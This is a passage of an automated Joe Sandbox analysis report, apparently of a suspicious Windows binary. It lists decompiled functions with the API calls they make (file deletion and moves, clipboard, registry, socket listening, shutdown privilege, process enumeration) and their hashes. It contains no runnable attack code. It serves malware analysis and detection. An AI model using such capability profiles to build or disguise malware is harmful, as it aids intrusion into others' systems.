                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                    • String ID:
                                                                    • API String ID: 1240663315-0
                                                                    • Opcode ID: 807404242e04907c579e9be4f6462a05be7010e8979af56ca3ca06301ac9eccf
                                                                    • Instruction ID: b88d6680a905eafa44d479c1d09c7ebad7dc44d55c36d81a5e24fef7801bfed3
                                                                    • Opcode Fuzzy Hash: 807404242e04907c579e9be4f6462a05be7010e8979af56ca3ca06301ac9eccf
                                                                    • Instruction Fuzzy Hash: CAE17E31604205AFCB54DF28C894D2FBBE5FF89714F08856DF88ADB265DA35E805CB91
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                    • String ID:
                                                                    • API String ID: 1737998785-0
                                                                    • Opcode ID: fbcf7a16ea246b36c8988c6723f0a2a74da6e135703864a758e6f0b72af05356
                                                                    • Instruction ID: 1628317bec70a9c4cfdb7c6fd5de9fb6e24260ce8d7c3d165a0c9571b21d1139
                                                                    • Opcode Fuzzy Hash: fbcf7a16ea246b36c8988c6723f0a2a74da6e135703864a758e6f0b72af05356
                                                                    • Instruction Fuzzy Hash: 1521A1B53002129FDB21AF64DC59B6E7BA8FF05750F04806AF9C6DB2A5DB79AC00CB54
                                                                    APIs
                                                                      • Part of subcall function 00FD4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FD4743,?,?,00FD37AE,?), ref: 00FD4770
                                                                      • Part of subcall function 01034A31: GetFileAttributesW.KERNEL32(?,0103370B), ref: 01034A32
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 010338A3
                                                                    • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0103394B
                                                                    • MoveFileW.KERNEL32(?,?), ref: 0103395E
                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0103397B
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0103399D
                                                                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 010339B9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                    • String ID: \*.*
                                                                    • API String ID: 4002782344-1173974218
                                                                    • Opcode ID: 8f9f523155c51f134adfb17bdf922ed455a69ab3a373e202efc412cd0dfdd6a3
                                                                    • Instruction ID: 3dc7377317704d7f16ef8e9488b0e671fed85cbe06a6abec18ae287df3529940
                                                                    • Opcode Fuzzy Hash: 8f9f523155c51f134adfb17bdf922ed455a69ab3a373e202efc412cd0dfdd6a3
                                                                    • Instruction Fuzzy Hash: 3551A33180524D9ACF11FBA4DD929EDB7B9AF50300F6400AAE482BB291EF356F0DDB51
                                                                    APIs
                                                                      • Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22
                                                                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0103F440
                                                                    • Sleep.KERNEL32(0000000A), ref: 0103F470
                                                                    • _wcscmp.LIBCMT ref: 0103F484
                                                                    • _wcscmp.LIBCMT ref: 0103F49F
                                                                    • FindNextFileW.KERNEL32(?,?), ref: 0103F53D
                                                                    • FindClose.KERNEL32(00000000), ref: 0103F553
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                    • String ID: *.*
                                                                    • API String ID: 713712311-438819550
                                                                    • Opcode ID: 1ec7ee45d0783dc501d75ed5a94896300a10bbcb47b865ab05dad456a421198e
                                                                    • Instruction ID: a6232bea56d28b3af1fd7de8294e2fc2c3db37e3ce85a9c45ad4db1511d05b14
                                                                    • Opcode Fuzzy Hash: 1ec7ee45d0783dc501d75ed5a94896300a10bbcb47b865ab05dad456a421198e
                                                                    • Instruction Fuzzy Hash: D3418E71C0020A9FDF50EF68DC48AEEBBB8FF45310F184096E995A7291EB359A84CB51
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID:
                                                                    • API String ID: 4104443479-0
                                                                    • Opcode ID: 5dca836acff262f6c1ca57839c3502c99fd97989d692bca8b43b1e61553f5e5b
                                                                    • Instruction ID: 9d0770e0ba47929280e369c4df7fb68b724477687a9198f7fca329f9f12e64cd
                                                                    • Opcode Fuzzy Hash: 5dca836acff262f6c1ca57839c3502c99fd97989d692bca8b43b1e61553f5e5b
                                                                    • Instruction Fuzzy Hash: 3D12CC70A00619DFDF14DFA5C981AEEB7F6FF48304F10452AE886E7255EB3AA910DB50
                                                                    APIs
                                                                      • Part of subcall function 00FD4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FD4743,?,?,00FD37AE,?), ref: 00FD4770
                                                                      • Part of subcall function 01034A31: GetFileAttributesW.KERNEL32(?,0103370B), ref: 01034A32
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 01033B89
                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 01033BD9
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 01033BEA
                                                                    • FindClose.KERNEL32(00000000), ref: 01033C01
                                                                    • FindClose.KERNEL32(00000000), ref: 01033C0A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                    • String ID: \*.*
                                                                    • API String ID: 2649000838-1173974218
                                                                    • Opcode ID: 481f9cae444ac237a549fb4cb16a3a47260e141fe97982fcf0b0508b7d327edf
                                                                    • Instruction ID: 2fc309fb25bb13b4ab3a130e0e85c949a3edb9073b32325e3788f3cb8e72002b
                                                                    • Opcode Fuzzy Hash: 481f9cae444ac237a549fb4cb16a3a47260e141fe97982fcf0b0508b7d327edf
                                                                    • Instruction Fuzzy Hash: 2C31A0310083859FC305FF28D8918AFB7EDBE91204F484D5EF4D586292EB29DA09DB63
                                                                    APIs
                                                                      • Part of subcall function 010287E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0102882B
                                                                      • Part of subcall function 010287E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 01028858
                                                                      • Part of subcall function 010287E1: GetLastError.KERNEL32 ref: 01028865
                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 010351F9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                    • String ID: $@$SeShutdownPrivilege
                                                                    • API String ID: 2234035333-194228
                                                                    • Opcode ID: 080c367d44749aa838160397c54c74df83d68937f0718ba99c24ea61ffaa6e9f
                                                                    • Instruction ID: ceb1a7e4ad2e452794c338378acadcd9c8634324362173b35703e2b569709bb1
                                                                    • Opcode Fuzzy Hash: 080c367d44749aa838160397c54c74df83d68937f0718ba99c24ea61ffaa6e9f
                                                                    • Instruction Fuzzy Hash: 44012B357912126BF778726C9C8AFBB76DCEB86240F140865FAC3E60E1D5555C008690
                                                                    APIs
                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 010462DC
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 010462EB
                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 01046307
                                                                    • listen.WSOCK32(00000000,00000005), ref: 01046316
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 01046330
                                                                    • closesocket.WSOCK32(00000000,00000000), ref: 01046344
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                                                    • String ID:
                                                                    • API String ID: 1279440585-0
                                                                    • Opcode ID: 9278d5e868049b8bc2ae3d50815d9aa327ddda265ceef498e342b81285ffd1a8
                                                                    • Instruction ID: 878059b502ee5d63887a872fdc0254a5c52731342b62e2712eba5d2e759c0fe3
                                                                    • Opcode Fuzzy Hash: 9278d5e868049b8bc2ae3d50815d9aa327ddda265ceef498e342b81285ffd1a8
                                                                    • Instruction Fuzzy Hash: A721F2706002159FCB10EF68C889A7EB7F9EF45720F148169E896E73C1DB79AD00DB51
                                                                    APIs
                                                                      • Part of subcall function 00FF0DB6: std::exception::exception.LIBCMT ref: 00FF0DEC
                                                                      • Part of subcall function 00FF0DB6: __CxxThrowException@8.LIBCMT ref: 00FF0E01
                                                                    • _memmove.LIBCMT ref: 01020258
                                                                    • _memmove.LIBCMT ref: 0102036D
                                                                    • _memmove.LIBCMT ref: 01020414
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                    • String ID:
                                                                    • API String ID: 1300846289-0
                                                                    • Opcode ID: b773df7ffd0365ccff34ae07948a06384808bf547c02ed287110a1045ccf0eb0
                                                                    • Instruction ID: a655db93352f321251eae04be6a83ecefb7a70e73f3e71443595e9fde5a74000
                                                                    • Opcode Fuzzy Hash: b773df7ffd0365ccff34ae07948a06384808bf547c02ed287110a1045ccf0eb0
                                                                    • Instruction Fuzzy Hash: 2302CDB1A00219DBCF04DF68D981ABEBBB5EF44304F1480AAF84ADB355EB35D910DB91
                                                                    APIs
                                                                      • Part of subcall function 00FD2612: GetWindowLongW.USER32(?,000000EB), ref: 00FD2623
                                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 00FD19FA
                                                                    • GetSysColor.USER32(0000000F), ref: 00FD1A4E
                                                                    • SetBkColor.GDI32(?,00000000), ref: 00FD1A61
                                                                      • Part of subcall function 00FD1290: DefDlgProcW.USER32(?,00000020,?), ref: 00FD12D8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ColorProc$LongWindow
                                                                    • String ID:
                                                                    • API String ID: 3744519093-0
                                                                    • Opcode ID: 9a80bc3b4dda5667b2163f51b4672ddfcdd6ce2b215db735a534f16034374798
                                                                    • Instruction ID: c8fe93895bf1cf6cc43cbf42efc0cb6bdd9aa7b595750263fb52e71b9cee70a1
                                                                    • Opcode Fuzzy Hash: 9a80bc3b4dda5667b2163f51b4672ddfcdd6ce2b215db735a534f16034374798
                                                                    • Instruction Fuzzy Hash: F5A13772106546BAF735AA298C58EBF399EFB42351F1C020BF582D53C5C9298D41B3B2
                                                                    APIs
                                                                      • Part of subcall function 01047D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 01047DB6
                                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0104679E
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 010467C7
                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 01046800
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0104680D
                                                                    • closesocket.WSOCK32(00000000,00000000), ref: 01046821
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                    • String ID:
                                                                    • API String ID: 99427753-0
                                                                    • Opcode ID: 4287864cd2b2693039bb09a9fa8532c0fc35cdb243be95a1f04b345346ee6e7b
                                                                    • Instruction ID: 0f03efba4df27caa18da0ad33785a3a0cb12e1b696646227a94b83e560567582
                                                                    • Opcode Fuzzy Hash: 4287864cd2b2693039bb09a9fa8532c0fc35cdb243be95a1f04b345346ee6e7b
                                                                    • Instruction Fuzzy Hash: EB41E375A002106FEB10BF68CC86F7E77EAAF05B10F48845DF955AB3C2DA789D019791
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                    • String ID:
                                                                    • API String ID: 292994002-0
                                                                    • Opcode ID: e55a460d8bd0a7df519ebff1d8271ef5af391aabc3f9b62f0173810ec4518fa7
                                                                    • Instruction ID: 5fc21f258dfcfdd1f341a6be8bcc1e88c33e4e722c4fdf7f7734962eaa956404
                                                                    • Opcode Fuzzy Hash: e55a460d8bd0a7df519ebff1d8271ef5af391aabc3f9b62f0173810ec4518fa7
                                                                    • Instruction Fuzzy Hash: 2911E231300211ABEB616F2ADC48A6F7BDDEF44760F448069EDC9D3242CBB898018AA0
                                                                    APIs
                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 01028121
                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0102812B
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0102813A
                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 01028141
                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01028157
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                    • String ID:
                                                                    • API String ID: 44706859-0
                                                                    • Opcode ID: aaaaa121cb743bbf8944a61e3a87ff12a66ece0039e20c82b5e32e8c0c8caa26
                                                                    • Instruction ID: 96366769b90b7b7d8007f85e5c1e22cad9b135eb0ff358ce014e8752e1834f19
                                                                    • Opcode Fuzzy Hash: aaaaa121cb743bbf8944a61e3a87ff12a66ece0039e20c82b5e32e8c0c8caa26
                                                                    • Instruction Fuzzy Hash: 97F0C274201325AFEB611FA8EC8DE6B3BECFF4A654B104056F9C5C3180DB6A9800DB60
                                                                    APIs
                                                                    • CoInitialize.OLE32(00000000), ref: 0103C432
                                                                    • CoCreateInstance.OLE32(01062D6C,00000000,00000001,01062BDC,?), ref: 0103C44A
                                                                      • Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22
                                                                    • CoUninitialize.OLE32 ref: 0103C6B7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                    • String ID: .lnk
                                                                    • API String ID: 2683427295-24824748
                                                                    • Opcode ID: 7f6e9a6a5d3449d677d8a8b88e29ad0adc5e5a941ad98417e50613650c5ce81d
                                                                    • Instruction ID: 7e46d2581a6369262fde8415c12ed9cc94ae2b9ab52ecec525e85a3cb526cd8f
                                                                    • Opcode Fuzzy Hash: 7f6e9a6a5d3449d677d8a8b88e29ad0adc5e5a941ad98417e50613650c5ce81d
                                                                    • Instruction Fuzzy Hash: E3A15A71108205AFD300EF54CC81EABB7EDEF88744F04491EF1959B291EBB5E909DB52
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00FD4AD0), ref: 00FD4B45
                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00FD4B57
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                                    • API String ID: 2574300362-192647395
                                                                    • Opcode ID: a25ae9c3c181fe83110fda6ccfc049760857f369f32de18719e1c1da1967d03a
                                                                    • Instruction ID: fed0ca14145defcf048eaf2234063fd2ac7c0dd97cbe567166913f4322a62fa0
                                                                    • Opcode Fuzzy Hash: a25ae9c3c181fe83110fda6ccfc049760857f369f32de18719e1c1da1967d03a
                                                                    • Instruction Fuzzy Hash: E8D01234A10713CFD7209F32D828B0776D5AF56251B15882F98C5DA200E678E880C758
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: __itow__swprintf
                                                                    • String ID:
                                                                    • API String ID: 674341424-0
                                                                    • Opcode ID: 40200185d801a7cc30a7d33d20a96e4265772bcbcaa5672375013cfc1165f63b
                                                                    • Instruction ID: bc02510d84b3bff6f693666802c88f1639f0ebd01c0fdd861e312acba81bf063
                                                                    • Opcode Fuzzy Hash: 40200185d801a7cc30a7d33d20a96e4265772bcbcaa5672375013cfc1165f63b
                                                                    • Instruction Fuzzy Hash: E422DD71A083419FC724DF24C884BAFB7E5AF84710F04492DF99A97391DB79EA04DB92
                                                                    APIs
                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 0104EE3D
                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0104EE4B
                                                                      • Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22
                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 0104EF0B
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0104EF1A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                    • String ID:
